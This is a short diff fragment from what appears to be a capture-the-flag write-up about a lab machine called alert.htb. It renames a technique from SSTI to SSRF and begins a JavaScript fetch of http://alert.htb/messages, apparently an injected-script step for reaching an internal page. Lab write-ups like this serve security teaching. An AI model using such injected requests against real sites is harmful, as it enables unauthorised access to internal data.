e1kfL0ck/writeups/Tuto.md

 });
 ```

-You can also make an SSTI ?
+You can also make an SSRF

 ```JavaScript
 fetch('http://alert.htb/messages')